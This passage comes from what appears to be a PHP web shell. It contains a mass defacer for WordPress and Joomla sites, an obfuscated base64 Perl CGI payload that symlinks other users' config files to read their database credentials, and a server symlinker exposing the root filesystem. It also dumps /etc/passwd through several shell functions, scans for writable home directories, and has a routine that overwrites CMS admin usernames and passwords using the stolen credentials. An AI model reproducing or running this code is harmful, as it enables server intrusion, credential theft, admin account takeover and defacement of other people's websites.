preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count1'] = $_SESSION['count1'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config03 && preg_match('/DB_NAME/i',$config03)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config03, $dd);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$_SESSION['count2'] = $_SESSION['count2'] + 1;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($_SESSION['count1']+$_SESSION['count2']).' (JOOMLA = '.$_SESSION['count1'].', WORDPRESS = '.$_SESSION['count2'].')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($_SESSION['count1']+$_SESSION['count2'] > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_2($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def);$output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHdkfTs
836 NCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2
837 h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19od
838 G1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwv
839 YmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRklMRSwgJy9ldGMvcGFzc3d
840 kJyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPCR5OyRrYSsrKXsNCiAgIC
841 B3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i = 1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.$i++.'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}function exec_mode_3($def_url) {$domains = @file_get_contents("/etc/named.conf");@preg_match_all('/.*?zone "(.*?)" {/', $domains, $out);$out = array_unique($out[1]);$num = count($out);print("Total domains: $num<br><br />");$def = file_get_contents($def_url);$def = urlencode($def); $output = fopen('defaced.html', 'a+');$defaced = '';$count1 = 0;$count2 = 0;echo '<table style="width:75%;"><tr style="background:rgba(160, 82, 45,0.6);"><th>ID</th><th>SID</th><th>Domain</th><th>Type</th><th>Action</th><th>Status</th></tr>';$j = 1;$map = array();foreach($out as $d) {$info = @posix_getpwuid(fileowner("/etc/valiases/".$d));$map[$info['name']] = $d;}$dt = 'IyEvdXNyL2Jpbi9wZXJsIC1JL3Vzci9sb2NhbC9iYW5kbWluDQpzdWIgbGlsew0KICAgICgkdXNlcikgPSBAXzsNCiAgICAkbXNyID0gcXh7cHd
842 kfTsNCiAgICAka29sYT0kbXNyLiIvIi4kdXNlcjsNCiAgICAka29sYT1+cy9cbi8vZzsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcH
843 VibGljX2h0bWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLicjI2pvb21sYS50eHQnKTsgDQogICAgc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL
844 3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLicjI3dvcmRwcmVzcy50eHQnKTsNCiAgICBzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicv
845 cHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nIyNzd29yZHByZXNzLnR4dCcpOw0KfQ0KDQpsb2NhbCAkLzsNCm9wZW4oRkl
846 MRSwgJ2RhdGEudHh0Jyk7ICANCkBsaW5lcyA9IDxGSUxFPjsgDQpjbG9zZShGSUxFKTsNCiR5ID0gQGxpbmVzOw0KDQpmb3IoJGthPTA7JGthPC
847 R5OyRrYSsrKXsNCiAgICB3aGlsZShAbGluZXNbJGthXSAgPX4gbS8oLio/KTp4Oi9nKXsNCiAgICAgICAgJmxpbCgkMSk7DQogICAgfQ0KfQ==';mkdir('plsym',0777);file_put_contents('plsym/data.txt', $_POST['man_data']);file_put_contents('plsym/plsym.cc', base64_decode($dt));chmod('plsym/plsym.cc', 0755);$wr = "Options FollowSymLinks MultiViews Indexes ExecCGI\n\nAddType application/x-httpd-cgi .cc\n\nAddHandler cgi-script .cc\nAddHandler cgi-script .cc";$fp = @fopen ('plsym/.htaccess','w');fwrite($fp, $wr);fclose($fp);$res = file_get_contents('http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/plsym.cc'); $url = 'http://'.$_SERVER['SERVER_NAME'].dirname($_SERVER['SCRIPT_NAME']).'/plsym/';unlink('plsym/plsym.cc');$data = file_get_contents($url);preg_match_all('/<a href="(.+)">/', $data, $match);unset($match[1][0]);$i=1;foreach($match[1] as $m){$mz = explode('##',urldecode($m));$config01 = '';$config02 = '';if($mz[1] == 'joomla.txt') {$config01 = file_get_contents($url.$m);}if($mz[1] == 'wordpress.txt') {$config02 = file_get_contents($url.$m);}$domain = $map[$mz[0]];$cls = ($j % 2 == 0) ? 'class="even"' : 'class="odd"';if($config01 && preg_match('/dbprefix/i',$config01)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td align="center">'.($i++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="pink">JOOMLA</font></td>';$res = index_changer_joomla($config01, $def, $domain);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count1++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}if($config02 && preg_match('/DB_NAME/i',$config02)){echo '<tr '.$cls.'><td align="center">'.($j++).'</td><td><a href="http://'.$domain.'" target="blank">'.$domain.'</a></td>';echo '<td align="center"><font color="yellow">WORDPRESS</font></td>';$res = index_changer_wp($config02, $def);echo '<td>'.$res['output'].'</td>';if($res['cond']) {echo '<td align="center"><span class="green">DEFACED</span></td>';fwrite($output, 'http://'.$domain."<br>");$count2++;} else {echo '<td align="center"><span class="red">FAILED</span></td>';}echo '</tr>';}}echo '</table>';echo '<hr/>';echo 'Total Defaced = '.($count1+$count2).' (JOOMLA = '.$count1.', WORDPRESS = '.$count2.')<br />';echo '<a href="defaced.html" target="_blank">View Total Defaced urls</a><br />';if($count1+$count2 > 0){echo '<a href="'.$_SERVER['PHP_SELF'].'?pass='.$_GET['pass'].'&zh=1" target="_blank" id="zhso">Send to Zone-H</a>';}}echo '<!DOCTYPE html><html><head><link href="http://fonts.googleapis.com/css?family=Orbitron:700" rel="stylesheet" type="text/css"><style type="text/css">.header {position:fixed;width:100%;top:0;background:#000;}.footer {position:fixed;width:100%;bottom:0;background:#000;}input[type="radio"]{margin-top: 0;}.td2 {border-left:1px solid red;border-radius: 2px 2px 2px 2px;}.even {background-color: rgba(25, 25, 25, 0.6);}.odd {background-color: rgba(102, 102, 102, 0.6);}textarea{background: rgba(0,0,0,0.6); color: white;}.green {color:#00FF00;font-weight:bold;}.red {color:#FF0000;font-weight:bold;}</style><script type="text/javascript">function change() {if(document.getElementById(\'rcd\').checked == true) {document.getElementById(\'tra\').style.display = \'\';} else {document.getElementById(\'tra\').style.display = \'none\';}}function hide() {document.getElementById(\'tra\').style.display = \'none\';}</script></head><body><h2 style="font-size:25px;color:#00ff00;text-align: center;font-family:orbitron;text-shadow: 6px 6px 6px black;">Wordpress and Joomla Mass Defacer</h2>';if(!isset($_POST['form_action']) && !isset($_GET['mode'])){echo '<form action="" method="post"><table align=center><tr><td><input type="radio" value="1" name="mode" checked="checked" onclick="hide();"></td><td>using /etc/named.conf ('.(is_readable('/etc/named.conf')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" onclick="hide();"></td><td>using /etc/passwd ('.(is_readable('/etc/passwd')?'<span class="green">READABLE</span>':'<span class="red">NOT READABLE</span>').')</td></tr><tr><td><input type="radio" value="2" name="mode" id="rcd" onclick="change();"></td><td>manual copy of /etc/passwd</td></tr><tr id="tra" style="display: none;"><td></td><td><textarea cols="60" rows="10" name="man_data"></textarea></td></tr></table><br><input type="hidden" name="form_action" value="1"><table align=center><tr><td><b>index url: </b><input class="inputz" size="45" type="text" name="defpage" value=""></tr></td></table><center><input class="inputzbut" type="submit" value="Attack !" name="Submit"></center></form>';}$milaf_el_index = $_POST['defpage'];if($_POST['form_action'] == 1) {if($_POST['mode']==1) { exec_mode_1($milaf_el_index); }if($_POST['mode']==2) { exec_mode_2($milaf_el_index); }if($_POST['mode']==3) { exec_mode_3($milaf_el_index); }}if($_GET['mode']==1) { exec_mode_1($milaf_el_index); }echo '</body></html>';
848 }
849} elseif($_GET['do'] == 'symser'){
850$d0mains = @file("/etc/named.conf");
851if($d0mains){@mkdir("/3c",0777);@chdir("/3c");@exe("ln -s / root");$file3 = 'Options all
852DirectoryIndex Sux.html
853AddType text/plain .php
854AddHandler server-parsed .php
855AddType text/plain .html
856AddHandler txt .html
857Require None
858Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=3>S. No.</font></td><td align=center><font size=3>Domains</font></td><td align=center><font size=3>Users</font></td><td align=center><font size=3>Symlink</font></td></tr>";$dcount = 1;foreach($d0mains as $d0main){if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);flush();if(strlen(trim($domains[1][0])) > 2){$user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));echo "<tr align=center><td><font size=3>" . $dcount . "</font></td><td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td><td>".$user['name']."</td><td><a href='/k2/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>"; flush();$dcount++;}}}echo "</table>";}else{$TEST=@file('/etc/passwd');if ($TEST){@mkdir("k2",0777);@chdir("k2");exe("ln -s / root");$file3 = 'Options all
859 DirectoryIndex Sux.html
860 AddType text/plain .php
861 AddHandler server-parsed .php
862 AddType text/plain .html
863 AddHandler txt .html
864 Require None
865 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><table align=center border=1><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$dcount = 1;$file = fopen("/etc/passwd", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table>";}else{if($os != "Windows"){@mkdir("k2",0777);@chdir("k2");@exe("ln -s / root");$file3 = 'Options all
866 DirectoryIndex Sux.html
867 AddType text/plain .php
868 AddHandler server-parsed .php
869 AddType text/plain .html
870 AddHandler txt .html
871 Require None
872 Satisfy Any';$fp3 = fopen('.htaccess','w');$fw3 = fwrite($fp3,$file3);@fclose($fp3);echo "<br><br><center><h2 class='cgx2'>server symlinker</h2><table align=center border=1><tr><td align=center><font size=4>id</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Symlink</font></td></tr>";$temp = "";$val1 = 0;$val2 = 1000;for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);if ($uid)$temp .= join(':',$uid)."\n";}echo '<br/>';$temp = trim($temp);$file5 = fopen("test.txt","w");fputs($file5,$temp);fclose($file5);$dcount = 1;$file = fopen("test.txt", "r") or exit("Unable to open file!");while(!feof($file)){$s = fgets($file);$matches = array();$t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")continue;echo "<tr><td align=center><font size=3>" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";echo "<td align=center><font class=txt><a href=/k2/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";$dcount++;}fclose($file);echo "</table></center>";unlink("test.txt");} else echo "<center><font size=4>Cannot create Symlink</font></center>";}}}
873 elseif($_GET['do'] == 'jumping') {
874 $i = 0;
875 echo "<div class='margin: 5px auto;'>";
876 if(preg_match("/hsphere/", $dir)) {
877 $urls = explode("\r\n", $_POST['url']);
878 if(isset($_POST['jump'])) {
879 echo "<pre>";
880 foreach($urls as $url) {
881 $url = str_replace(array("http://","www."), "", strtolower($url));
882 $etc = "/etc/passwd";
883 $f = fopen($etc,"r");
884 while($gets = fgets($f)) {
885 $pecah = explode(":", $gets);
886 $user = $pecah[0];
887 $dir_user = "/hsphere/local/home/$user";
888 if(is_dir($dir_user) === true) {
889 $url_user = $dir_user."/".$url;
890 if(is_readable($url_user)) {
891 $i++;
892 $jrw = "[<font color=lime>R</font>] <a href='?ec=ciumakumz&folder=$url_user'><font color=gold>$url_user</font></a>";
893 if(is_writable($url_user)) {
894 $jrw = "[<font color=lime>RW</font>] <a href='?ec=ciumakumz&folder=$url_user'><font color=gold>$url_user</font></a>";
895 }
896 echo $jrw."<br>";
897 }
898 }
899 }
900 }
901 if($i == 0) {
902 } else {
903 echo "<br>Total ada ".$i." Kamar di ".$ip;
904 }
905 echo "</pre>";
906 } else {
907 echo '<center>
908 <form method="post">
909 List Domains: <br>
910 <textarea name="url" style="width: 500px; height: 250px;">';
911 $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
912 while($getss = fgets($fp)) {
913 echo $getss;
914 }
915 echo '</textarea><br>
916 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
917 </form></center>';
918 }
919 } elseif(preg_match("/vhosts/", $dir)) {
920 $urls = explode("\r\n", $_POST['url']);
921 if(isset($_POST['jump'])) {
922 echo "<pre>";
923 foreach($urls as $url) {
924 $web_vh = "/var/www/vhosts/$url/httpdocs";
925 if(is_dir($web_vh) === true) {
926 if(is_readable($web_vh)) {
927 $i++;
928 $jrw = "[<font color=lime>R</font>] <a href='?ec=ciumakumz&folder=$web_vh'><font color=gold>$web_vh</font></a>";
929 if(is_writable($web_vh)) {
930 $jrw = "[<font color=lime>RW</font>] <a href='?ec=ciumakumz&folder=$web_vh'><font color=gold>$web_vh</font></a>";
931 }
932 echo $jrw."<br>";
933 }
934 }
935 }
936 if($i == 0) {
937 } else {
938 echo "<br>Total ada ".$i." Kamar di ".$ip;
939 }
940 echo "</pre>";
941 } else {
942 echo '<center>
943 <form method="post">
944 List Domains: <br>
945 <textarea name="url" style="width: 500px; height: 250px;">';
946 bing("ip:$ip");
947 echo '</textarea><br>
948 <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
949 </form></center>';
950 }
951 } else {
952 echo "<pre>";
953 $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
954 while($passwd = fgets($etc)) {
955 if($passwd == '' || !$etc) {
956 echo "<font color=red>Can't read /etc/passwd</font>";
957 } else {
958 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
959 foreach($user_jumping[1] as $user_ec_jump) {
960 $user_jumping_dir = "/home/$user_ec_jump/public_html";
961 if(is_readable($user_jumping_dir)) {
962 $i++;
963 $jrw = "[<font color=lime>R</font>] <a href='?ec=ciumakumz&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
964 if(is_writable($user_jumping_dir)) {
965 $jrw = "[<font color=lime>RW</font>] <a href='?ec=ciumakumz&folder=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
966 }
967 echo $jrw;
968 if(function_exists('posix_getpwuid')) {
969 $domain_jump = file_get_contents("/etc/named.conf");
970 if($domain_jump == '') {
971 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
972 } else {
973 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
974 foreach($domains_jump[1] as $dj) {
975 $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
976 $user_jumping_url = $user_jumping_url['name'];
977 if($user_jumping_url == $user_ec_jump) {
978 echo " => ( <u>$dj</u> )<br>";
979 break;
980 }
981 }
982 }
983 } else {
984 echo "<br>";
985 }
986 }
987 }
988 }
989 }
990 if($i == 0) {
991 } else {
992 echo "<br>Total ada ".$i." Kamar di ".$ip;
993 }
994 echo "</pre>";
995 }
996 echo "</div>";
997} elseif($_GET['do'] == 'etcpler'){
998 echo "<center>Bypass etc/passw With:<br>
999<table style='width:50%' align='center'>
1000 <tr>
1001 <td><form method='post'><input type='submit' value='System Function' name='syst'></form></td>
1002 <td><form method='post'><input type='submit' value='Passthru Function' name='passth'></form></td>
1003 <td><form method='post'><input type='submit' value='Exec Function' name='ex'></form></td>
1004 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shex'></form></td>
1005 <td><form method='post'><input type='submit' value='Posix_getpwuid Function' name='melex'></form></td>
1006</tr></table></center><center>Bypass User With : <table style='width:50%' align='center'>
1007<tr>
1008 <td><form method='post'><input type='submit' value='Awk Program' name='awkuser'></form></td>
1009 <td><form method='post'><input type='submit' value='System Function' name='systuser'></form></td>
1010 <td><form method='post'><input type='submit' value='Passthru Function' name='passthuser'></form></td>
1011 <td><form method='post'><input type='submit' value='Exec Function' name='exuser'></form></td>
1012 <td><form method='post'><input type='submit' value='Shell_exec Function' name='shexuser'></form></td>
1013</tr>
1014</table><br>";
1015 if ($_POST['awkuser']) {
1016echo"<textarea class='inputzbut' cols='65' rows='15'>";
1017echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
1018echo "</textarea><br>";
1019}
1020if ($_POST['systuser']) {
1021echo"<textarea class='inputzbut' cols='65' rows='15'>";
1022echo system("ls /var/mail");
1023echo "</textarea><br>";
1024}
1025if ($_POST['passthuser']) {
1026echo"<textarea class='inputzbut' cols='65' rows='15'>";
1027echo passthru("ls /var/mail");
1028echo "</textarea><br>";
1029}
1030if ($_POST['exuser']) {
1031echo"<textarea class='inputzbut' cols='65' rows='15'>";
1032echo exec("ls /var/mail");
1033echo "</textarea><br>";
1034}
1035if ($_POST['shexuser']) {
1036echo"<textarea class='inputzbut' cols='65' rows='15'>";
1037echo shell_exec("ls /var/mail");
1038echo "</textarea><br>";
1039}
1040if($_POST['syst'])
1041{
1042echo"<textarea class='inputz' cols='65' rows='15'>";
1043echo system("cat /etc/passwd");
1044echo"</textarea><br><br><b></b><br>";
1045}
1046if($_POST['passth'])
1047{
1048echo"<textarea class='inputz' cols='65' rows='15'>";
1049echo passthru("cat /etc/passwd");
1050echo"</textarea><br><br><b></b><br>";
1051}
1052if($_POST['ex'])
1053{
1054echo"<textarea class='inputz' cols='65' rows='15'>";
1055echo exec("cat /etc/passwd");
1056echo"</textarea><br><br><b></b><br>";
1057}
1058if($_POST['shex'])
1059{
1060echo"<textarea class='inputz' cols='65' rows='15'>";
1061echo shell_exec("cat /etc/passwd");
1062echo"</textarea><br><br><b></b><br>";
1063}
1064echo '<center>';
1065if($_POST['melex'])
1066{
1067echo"<textarea class='inputz' cols='65' rows='15'>";
1068for($uid=0;$uid<60000;$uid++){
1069$ara = posix_getpwuid($uid);
1070if (!empty($ara)) {
1071while (list ($key, $val) = each($ara)){
1072print "$val:";
1073}
1074print "\n";
1075}
1076}
1077echo"</textarea><br><br>";
1078}
1079} elseif($_GET['do'] == 'auto_edit_user') {
1080 if($_POST['hajar']) {
1081 if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
1082 echo "username atau password harus lebih dari 6 karakter";
1083 } else {
1084 $user_baru = $_POST['user_baru'];
1085 $pass_baru = md5($_POST['pass_baru']);
1086 $conf = $_POST['config_dir'];
1087 $scan_conf = scandir($conf);
1088 foreach($scan_conf as $file_conf) {
1089 if(!is_file("$conf/$file_conf")) continue;
1090 $config = file_get_contents("$conf/$file_conf");
1091 if(preg_match("/JConfig|joomla/",$config)) {
1092 $dbhost = ambilkata($config,"host = '","'");
1093 $dbuser = ambilkata($config,"user = '","'");
1094 $dbpass = ambilkata($config,"password = '","'");
1095 $dbname = ambilkata($config,"db = '","'");
1096 $dbprefix = ambilkata($config,"dbprefix = '","'");
1097 $prefix = $dbprefix."users";
1098 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1099 $db = mysql_select_db($dbname);
1100 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1101 $result = mysql_fetch_array($q);
1102 $id = $result['id'];
1103 $site = ambilkata($config,"sitename = '","'");
1104 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
1105 echo "Config => ".$file_conf."<br>";
1106 echo "CMS => Joomla<br>";
1107 if($site == '') {
1108 echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
1109 } else {
1110 echo "Sitename => $site<br>";
1111 }
1112 if(!$update OR !$conn OR !$db) {
1113 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1114 } else {
1115 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1116 }
1117 mysql_close($conn);
1118 } elseif(preg_match("/WordPress/",$config)) {
1119 $dbhost = ambilkata($config,"DB_HOST', '","'");
1120 $dbuser = ambilkata($config,"DB_USER', '","'");
1121 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1122 $dbname = ambilkata($config,"DB_NAME', '","'");
1123 $dbprefix = ambilkata($config,"table_prefix = '","'");
1124 $prefix = $dbprefix."users";
1125 $option = $dbprefix."options";
1126 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1127 $db = mysql_select_db($dbname);
1128 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1129 $result = mysql_fetch_array($q);
1130 $id = $result[ID];
1131 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1132 $result2 = mysql_fetch_array($q2);
1133 $target = $result2[option_value];
1134 if($target == '') {
1135 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1136 } else {
1137 $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
1138 }
1139 $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
1140 echo "Config => ".$file_conf."<br>";
1141 echo "CMS => Wordpress<br>";
1142 echo $url_target;
1143 if(!$update OR !$conn OR !$db) {
1144 echo "Status => <font color=red>".mysql_error()."</font><br><br>";
1145 } else {
1146 echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
1147 }
1148 mysql_close($conn);
1149 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
1150 $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
1151 $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
1152 $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
1153 $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
1154 $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
1155 $prefix = $dbprefix."admin_user";
1156 $option = $dbprefix."core_config_data";
1157 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1158 $db = mysql_select_db($dbname);
1159 $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
1160 $result = mysql_fetch_array($q);
1161 $id = $result[user_id];
1162 $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
1163 $result2 = mysql_fetch_array($q2);
1164 $target = $result2[value];
1165 if($target == '') {
1166 $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
1167 } else {
1168 $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
1169 }
1170 $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
1171 echo "Config => ".$file_conf."<br>";
1172 echo "CMS => Magento<br>";
1173 echo $url_target;
